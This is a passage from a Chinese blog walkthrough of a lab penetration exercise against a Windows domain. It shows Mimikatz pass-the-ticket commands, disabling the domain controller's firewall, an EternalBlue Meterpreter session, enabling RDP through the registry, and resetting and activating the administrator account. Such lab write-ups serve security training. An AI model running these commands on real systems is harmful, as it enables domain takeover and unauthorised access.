  2. kerberos::ptc TGT_douser@demo.com.ccache
  3. kerberos::list



\\WIN-ENS2VR5TR3N  域控




  1. 到这我们的域控其实就已经拿下了!我们去试试永恒之蓝漏洞!
  2. 先把dc防火墙关掉:netsh advfirewall set allprofiles state off


成功了!

改成set rhosts 192.168.183.130即可。

  1. meterpreter > sysinfo
  2. Computer : WIN-ENS2VR5TR3N
  3. OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
  4. Architecture : x64
  5. System Language : zh_CN
  6. Domain : DEMO
  7. Logged On Users : 1
  8. Meterpreter : x64/windows
  9. meterpreter > shell
  10. Process 2896 created.
  11. Channel 1 created.
  12. Microsoft Windows [�汾 6.1.7601]
  13. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
  14. C:\Windows\system32>chcp 65001
  15. chcp 65001
  16. Active code page: 65001
  17. C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  18. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  19. The operation completed successfully.
  20. C:\Windows\system32>net user administrator Admin123
  21. net user administrator Admin123
  22. The command completed successfully.
  23. C:\Windows\system32>net user administrator /active:yes
  24. net user administrator /active:yes
  25. The command completed successfully.

ok,利用永恒之蓝也是可以的!至此红日四打完了!
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/211309
推荐阅读
相关标签
  

闽ICP备14008679号